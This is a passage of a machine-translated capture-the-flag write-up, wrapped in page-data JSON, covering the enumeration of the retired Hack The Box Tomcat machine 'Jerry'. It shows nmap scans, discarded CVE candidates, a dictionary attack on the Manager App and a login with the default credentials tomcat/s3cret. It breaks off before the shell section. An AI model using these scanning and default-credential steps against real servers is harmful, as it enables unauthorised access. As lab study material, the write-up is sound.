{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-jerry-en","result":{"data":{"markdownRemark":{"id":"e28652c1-1fbe-52a5-ab69-e80fa9dc6d98","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-windows-jerry\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/d9f5b0f1c00cf5945d5d103c87b24897/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABXUlEQVQY0zWPTU8TURSG51+4Z6MbCXQotJ17h7md29Kp/UjpOKVDWmimgiFUwcqCVop87FzpwrgyLk3csuAn+Kvu463GxZs3Ocl5znOcj7MplxdvzPXsLclej/puj0a3RzvZp5sOSQ/H1DsJIqyhak22tjUqauGFEbJSR+iIvCzjeoGxwfn148o8/PzE78fv3CymZCdnTC/nHE/Omby7YH5zx3B8jGruEg9G9mBCtz9gfPSKveGIQXZEIagsgWyI0DiL2xafv8zMt6933C/e00oO2R+9tjZtfN0kTjOU7Y1WSk53WA8aSF1meiAQwTYV7bNWVLgladYKLk67t2Ky04gP8wOyUUwYezT6imosiPolXqQS3RF4VZ/qyyKy7tvlMptSWSNl37VmXsh6yUUnT4zzPPfUDp4ZP9gkLySlivgXLfF2llnCJIWyj6zZVkugNfL+J/gLzhWlWc27/AF2msC3VU1XuAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/d9f5b0f1c00cf5945d5d103c87b24897/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/d9f5b0f1c00cf5945d5d103c87b24897/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/d9f5b0f1c00cf5945d5d103c87b24897/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This time I am writing up the retired HackTheBox machine “Jerry”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#gaining-a-shell\">Gaining a Shell</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>I started with a port scan as usual.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.95 $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\nStarting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2022</span>-07-31 05:46 PDT\nNote: Host seems down. If it is really up, but blocking our <span class=\"token function\">ping</span> probes, try -Pn\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">0</span> hosts up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">2.26</span> seconds</code></pre></div>\n<p>The host appeared to be down (possibly a false negative), so I added the <code class=\"language-text\">-Pn</code> option. This revealed that port 8080 was open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\nStarting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2022</span>-07-31 05:46 PDT\nNmap scan report <span class=\"token keyword\">for</span> <span class=\"token variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.10.95<span class=\"token punctuation\">)</span>\nHost is up <span class=\"token punctuation\">(</span><span class=\"token number\">0</span>.23s latency<span class=\"token punctuation\">)</span>.\nNot shown: <span class=\"token number\">999</span> filtered tcp ports <span class=\"token punctuation\">(</span>no-response<span class=\"token punctuation\">)</span>\nPORT     STATE SERVICE VERSION\n<span class=\"token number\">8080</span>/tcp <span class=\"token function\">open</span>  http    Apache Tomcat/Coyote JSP engine <span class=\"token number\">1.1</span>\n<span class=\"token operator\">|</span>_http-title: Apache Tomcat/7.0.88\n<span class=\"token operator\">|</span>_http-favicon: Apache Tomcat\n<span class=\"token operator\">|</span>_http-server-header: Apache-Coyote/1.1\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class=\"token builtin class-name\">.</span>\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">1</span> <span class=\"token function\">host</span> up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">31.08</span> seconds</code></pre></div>\n<p>Accessing it showed that <code class=\"language-text\">Apache Tomcat/7.0.88</code> was running.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 632px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/beb833177b865ccf390ec378d89668d2/084e2/image-20220731214938781.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 62.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAAClElEQVQoz3WQ204TURiF+xaiEkABD4AiImo0XmhMfBavfQYTvVJABERbSFoOBQ/ReIgR0cRTBSuddgalFkM7nXbaTqethyLT9nMzFEWNs+fLWv/eKys729HU3EL7gU5OnjpNR+cxDhw8ysGu43QePs6+9i52NrdS19BMzbZ6tghqtjewtXZHlYYqO36pY2ttI9vrmqnfuZfG3e10dJ1gT9shm4amNlrbj9Cyv4u9+w6xq6WD+sYWamqb/oujt2+A3iv9dPdcZXDIyZBzhL7+IQau3aC796qtawwOucT+NXpE9lJ3H5dFfk3/8D19OPjrKxaLGEaGQiFPMplAT6UEOrl8jpTQmBpDjatkzSyaptpz1jTQEpp97iiVSqxhWZZdKMsys299SIEgoaBM4P08c29nUeQFfK/ekNIzds5atShbZZvSamldBY5KpWIHNtTMmSR0jWV9mWg6RkT9RCQeIW7EWdIi6AUdc8XELJpki1lbN/tq4TobpekfKVyBYVySC6c0jCc0ytTCTbwLXrzKJJPyJGPBcZvR4BjugEf4McZD3vXCjbX2fyvnyVV05IyEL+pjLuZDMSR7DqUDyGkJRSDbPkAk/5GlwiLhvMJiTtlUWL2dYSWQEvM8nnbycPQs/sBNEuUo/vRLAoYPf+Y1s6kXzKVe8k6gfPETKcqkRcaoqJsLy3Zh9GuYEfc5xi608ejGGeTkc5SVOe7ER3mQnOJ+clJ4D3cTE9wWe97oMK/NJ8QsheVVuVpY+V0oqTNMPL3IM9nJ9JvzPF9w41+Zwb3cjyc2gDs6gEcwoV4X8yBTmotp4xb3dA+vCo/+fUOznCRDjDQaOiraapi4FWZpRRaEiFT5LOZIMUi4KNksfp8XN/zATyiM+jt1QzblAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/beb833177b865ccf390ec378d89668d2/8ac56/image-20220731214938781.webp 240w,\n/static/beb833177b865ccf390ec378d89668d2/d3be9/image-20220731214938781.webp 480w,\n/static/beb833177b865ccf390ec378d89668d2/59680/image-20220731214938781.webp 632w\"\n              sizes=\"(max-width: 632px) 100vw, 632px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/beb833177b865ccf390ec378d89668d2/8ff5a/image-20220731214938781.png 240w,\n/static/beb833177b865ccf390ec378d89668d2/e85cb/image-20220731214938781.png 480w,\n/static/beb833177b865ccf390ec378d89668d2/084e2/image-20220731214938781.png 632w\"\n            sizes=\"(max-width: 632px) 100vw, 632px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/beb833177b865ccf390ec378d89668d2/084e2/image-20220731214938781.png\"\n            alt=\"image-20220731214938781\"\n            title=\"image-20220731214938781\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>To look for vulnerabilities, I read through the <a href=\"https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.109\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Apache Tomcat 7 vulnerabilities</a> release notes.</p>\n<p>I found an RCE vulnerability, CVE-2019-0232, but unfortunately <code class=\"language-text\">cgi/ism.bat</code> did not exist on the target, so that exploit was not applicable.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4f5206ac1044c6f0ec39c271be54c073/7131f/image-20220731220827410.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 73.33333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACI0lEQVQ4y51Ua5ObMAy8////2ssVEsC838QkEAhU3ZVD56b9FmYUGxmvVlopH4JnXVdpu1bG0YodRxlvo7z7fPCnKAo5nT7F8zw5fX2Jf/YlCALxfE+qqpL7/S632w1mYVc1a69yvf5vCjiCVRCEkiSxhGEocRyLMUaiKJI8z9WSNJGqviHAE7bIND1l3zd5PmlPtX3fHeA8TwAI9GIM0MhEkmUG+1CZMsjlcpYgzBCkg69GVrX0Qy9N20jf9zJcB8lM6ACtneV85seBXABAtj9+Jki90CBFkUtd19inUlY5GIJxbCTNUmVeliX8Jcr2ywGSfpx0+LCQoqRV+PCOIL/lat8QZV0fiJJLlmeuZgVZgbEBcNJIi7S6vpNhGJCeW2ld12m6bdtq+tbag+GEi4nWj4JQDKaQoIZ5nihrCnacUzAau4Mp009hl2VxgI/HQ1l16MW6abTQ67rJtpH9GymTISMyGhWNIrZOjfdVTLwgrQfaYtEBIAu2CPeH0cd1muaD4YyLLiUqZ2K2jIHaHup4AbiBQL5rn+Ciq0FrcQDM64wlKqvGATICpW+QboW1qiu0SQemd/gnpL45Nt+Y0beoj++LNvXflFlDKkxh0tT1Fve+n4BBAdBCGbAXGbhuah3Jw3jG/wIq/5qUWUEIlr5U63HY1LxcaasQ7ACg6gQmQANwnpHUt9GbNV2L4R5eQ37M5r7tmp7u/zH1b26v84wS/AHXHXSUg4jS0gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4f5206ac1044c6f0ec39c271be54c073/8ac56/image-20220731220827410.webp 240w,\n/static/4f5206ac1044c6f0ec39c271be54c073/d3be9/image-20220731220827410.webp 480w,\n/static/4f5206ac1044c6f0ec39c271be54c073/457aa/image-20220731220827410.webp 710w\"\n              sizes=\"(max-width: 710px) 100vw, 710px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4f5206ac1044c6f0ec39c271be54c073/8ff5a/image-20220731220827410.png 240w,\n/static/4f5206ac1044c6f0ec39c271be54c073/e85cb/image-20220731220827410.png 480w,\n/static/4f5206ac1044c6f0ec39c271be54c073/7131f/image-20220731220827410.png 710w\"\n            sizes=\"(max-width: 710px) 100vw, 710px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4f5206ac1044c6f0ec39c271be54c073/7131f/image-20220731220827410.png\"\n            alt=\"image-20220731220827410\"\n            title=\"image-20220731220827410\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The next vulnerability I found was <code class=\"language-text\">CNVD-2020-10487 (CVE-2020-1938)</code>, but the ajp13 port appeared to be filtered, so this one would not work either.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -sV -sC -T4 -Pn -p <span class=\"token number\">8009</span> <span class=\"token variable\">$RHOST</span>\nStarting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2022</span>-07-31 06:35 PDT\nNmap scan report <span class=\"token keyword\">for</span> <span class=\"token variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.10.95<span class=\"token punctuation\">)</span>\nHost is up.\n\nPORT     STATE    SERVICE VERSION\n<span class=\"token number\">8009</span>/tcp filtered ajp13</code></pre></div>\n<p>So I kept looking for other entry points.</p>\n<p>There was a page called Manager App that required authentication.</p>\n<p>The default Tomcat credentials were reported to be admin with a blank password, but that did not work.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 896px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/945003f9cd978bda8d73741127f48139/4c42d/image-20220801083425426.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 39.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABiklEQVQoz42QzU4aURiG5yKMxja0if0JICAwUBx+AiMdMUgifxWQQQMRFtNFd6y67mV0521oLIRNjbehO3BIbAKBp3NOUhYuGk7y5Dvn5Jz3/b5Xcb19z0d3APduCLc3iNev8u6Dj1euHTY2X7Ox5WJz+81aiLdKNJZCS+gk04d8Pjrh6LjEgVEgkTbQklm0VBZ/MIbHMfL6I3gDUVk9PhW3YDcs94I9NY4yHo+x7SlPts10Ol0h7p6f//Dw8IhlfaVSqVCv12mcNajVahQKBfL5Y1kFuq5zfX2Dslwu+d+yHSPLsjg9/UKrZdJsNiWmaUqDarVKuVyWgqPRCGU2myFEX7JYLKSgmKDb7VIsFjFyeWJx3YlCcMC+E9UnLU0skSXiRDccDlHm87n8+LLTf+fJZEKv16NUKhJPZgiE9wmqmiQU0QhHNdTQHgGfh8FgsJ6gGC+TyZDL5TAMY0VaFxySavxAPfnO7a81OhQZ9vt9KdrpdGi32yta5x3Mi0vO+ldUvv3k9909fwGXsZdwr7rjcwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/945003f9cd978bda8d73741127f48139/8ac56/image-20220801083425426.webp 240w,\n/static/945003f9cd978bda8d73741127f48139/d3be9/image-20220801083425426.webp 480w,\n/static/945003f9cd978bda8d73741127f48139/c1a89/image-20220801083425426.webp 896w\"\n              sizes=\"(max-width: 896px) 100vw, 896px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/945003f9cd978bda8d73741127f48139/8ff5a/image-20220801083425426.png 240w,\n/static/945003f9cd978bda8d73741127f48139/e85cb/image-20220801083425426.png 480w,\n/static/945003f9cd978bda8d73741127f48139/4c42d/image-20220801083425426.png 896w\"\n            sizes=\"(max-width: 896px) 100vw, 896px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/945003f9cd978bda8d73741127f48139/4c42d/image-20220801083425426.png\"\n            alt=\"image-20220801083425426\"\n            title=\"image-20220801083425426\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I ran a dictionary attack with the username set to admin, and found that the password was also <code class=\"language-text\">admin</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 958px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6a16e30cbd8b21c994241fa61fbbd90f/b97f6/image-20220731232257018.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAw0lEQVQY0y2QWQ7DIAxEc6mSoCYYkhIwW1X1/meZGujHyMbL05gll4RSE3KO4BRR5F1rRog3mAPu2yNlxnk6hDBrs/4avZ5HmT2OA0QGS+oQWQjBj0ZODJbYc7JmgMgYOInGHEMk2vddIDusJVhnZc5Ca40lfsRN4wkVl75F9JqPfsDrt4G/9e88yTLB8AX91FAPhXVdh7Ztg1IKS3kXRAH1M1PhofenycnTMUsvtzzy1uZXXPeF83KwRHDirp/aYR38A2lfkC4vbVe8AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6a16e30cbd8b21c994241fa61fbbd90f/8ac56/image-20220731232257018.webp 240w,\n/static/6a16e30cbd8b21c994241fa61fbbd90f/d3be9/image-20220731232257018.webp 480w,\n/static/6a16e30cbd8b21c994241fa61fbbd90f/cb8de/image-20220731232257018.webp 958w\"\n              sizes=\"(max-width: 958px) 100vw, 958px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6a16e30cbd8b21c994241fa61fbbd90f/8ff5a/image-20220731232257018.png 240w,\n/static/6a16e30cbd8b21c994241fa61fbbd90f/e85cb/image-20220731232257018.png 480w,\n/static/6a16e30cbd8b21c994241fa61fbbd90f/b97f6/image-20220731232257018.png 958w\"\n            sizes=\"(max-width: 958px) 100vw, 958px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6a16e30cbd8b21c994241fa61fbbd90f/b97f6/image-20220731232257018.png\"\n            alt=\"image-20220731232257018\"\n            title=\"image-20220731232257018\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Login succeeded, but it seemed I had no privileges.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c5a2eb245f09de631893af9242dd8952/8affb/image-20220801083557346.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 40.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABfklEQVQoz32R607CQBCF+yhKUCNgalQSicY/vqWXgEZiBDExxochttiWQktLqy3lZoHjzDQY/+gmX85OdvfsmV1lTz1C+fgMldNz7B+dQD2ooLB3iO1dVchtlbCRL2AzXyQtiv4mt12iPUXsFFSU1DKU++YL6g/PaLReUas/4fq2heod66NwddPEZS1jPb+oNnBRa2QqPOCKal5X9I4OTdOg6TreSA3TwrthwrS6AteMaVnQOx1Zc9wBen1HGHi+1H3HFZRulw3ewcYGqW2TiWHANA1YZGL3bPAe27bJlMwcB0kyQhxHpAkWiwUWaUqaIk2/oPBGx6Xbej34vo8oihB+hPCHQ3zSPI5jRMRoNBKSZIzJZILxeCyw6XptPp9D8XyPWspuZtMuJbQokTsYyO08VqtVluQfUkq5XC6hDClJu92W99N0DR16J1ZOHoahEBCz2UwO/GW4HkoQDOUwp+K30+lzXNdFEATg9J6XwS1Jq5Os5Z+2qZ5Op9IF8w14mx278yPO/AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c5a2eb245f09de631893af9242dd8952/8ac56/image-20220801083557346.webp 240w,\n/static/c5a2eb245f09de631893af9242dd8952/d3be9/image-20220801083557346.webp 480w,\n/static/c5a2eb245f09de631893af9242dd8952/e46b2/image-20220801083557346.webp 960w,\n/static/c5a2eb245f09de631893af9242dd8952/a1214/image-20220801083557346.webp 1254w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c5a2eb245f09de631893af9242dd8952/8ff5a/image-20220801083557346.png 240w,\n/static/c5a2eb245f09de631893af9242dd8952/e85cb/image-20220801083557346.png 480w,\n/static/c5a2eb245f09de631893af9242dd8952/d9199/image-20220801083557346.png 960w,\n/static/c5a2eb245f09de631893af9242dd8952/8affb/image-20220801083557346.png 1254w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c5a2eb245f09de631893af9242dd8952/d9199/image-20220801083557346.png\"\n            alt=\"image-20220801083557346\"\n            title=\"image-20220801083557346\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I tried the credentials <code class=\"language-text\">tomcat/s3cret</code> shown in the Example section of that page, and was able to log in to the Manager App.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/98a3eefbe009bd1ecebd96c6be2b02b1/c6671/image-20220801083738285.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 66.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC0ElEQVQ4y6WS224bVRSG5yGAlJa0IkVqRG/hqXgOhMSpKMSlatPQkl4UqYi7UFG11I7HMz7N+HyceA6ek+1x7CS2Q+PSr9uDKBcVV2zp0z97rX/ttUZ7S5fWr7J5/ROuXf+U9Q83ubLxMZc3Nrm4/hEXLm3EvPv+Fd5ZE1z4D9Yusyb8732wgfQ8JXP/7g0e7/+CVqqSyxfR9DL5gkY2V4jJKFnkjPoWq3hmpWqe5K+POPjtMZLREptHn3E8rPN/1l/eACYTpNPTKYvFgtOTKcuXLzk/P49ZLpecnS0IwxDP83BdV6gb7/v9PuPxOPa88b96FSNFUcR8Pmc2mzEXLBbzN8xnpwwGoTgkwPc9HMcmCHxs22I0GnL+4sW//vksRkruJ8j+/hXd3C1MfVdwl15xB1MTqu3QVBI0MtsYhTt4tT3s8o+41Z9oZ3+gkvqOQ+H9x7+qlbJPE2T2P6etbInETXqFBEZ+O/7uZLfQn31BSVBPfyPiCdrqlmj+PbXU11STXwr/TcxVXUxCXErxIeP2Q4LKPazCbSbtPcLqLlHjHo62S1h7wNz8maPWA5HfwY5j92nJ29RT39ITTbvKDfzKHeHZQ2oemZjLAbWJiTZo0zxxKA27lEZdGsc2xp8B3TM/jtenllCbzsIl3dFI6+JpNWsUWy10t0Np3BW/bKlUpxX0gYbqKJQinZybJef9TW1aFQfXKUcl0bAoGulUJxWUuoycP+Cp/gS5fEDZ1Mn7OaSW18QRk1gTC0NM1heTGCMDc9yjFx3SP+4TLALhcWKPPbXxZh75Vg6lmEGrapRqOg27HtdJSVsmPRKvPcqR9GXUSYFUmOFgoJAMMsijLMVZGfWoEHsUobkTjWeNFLKu8qT2B2qngOZVeB6kkfpGnWloMfZ7BGaTSWAycDqEVitmlZtFbhwfe4ccCT0eOnRreapaGqNZwDLK+FaDoah7DehAaYbuzxTNAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/98a3eefbe009bd1ecebd96c6be2b02b1/8ac56/image-20220801083738285.webp 240w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/d3be9/image-20220801083738285.webp 480w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/e46b2/image-20220801083738285.webp 960w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/ea1d1/image-20220801083738285.webp 1129w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/98a3eefbe009bd1ecebd96c6be2b02b1/8ff5a/image-20220801083738285.png 240w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/e85cb/image-20220801083738285.png 480w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/d9199/image-20220801083738285.png 960w,\n/static/98a3eefbe009bd1ecebd96c6be2b02b1/c6671/image-20220801083738285.png 1129w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/98a3eefbe009bd1ecebd96c6be2b02b1/d9199/image-20220801083738285.png\"\n            alt=\"image-20220801083738285\"\n            title=\"image-20220801083738285\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 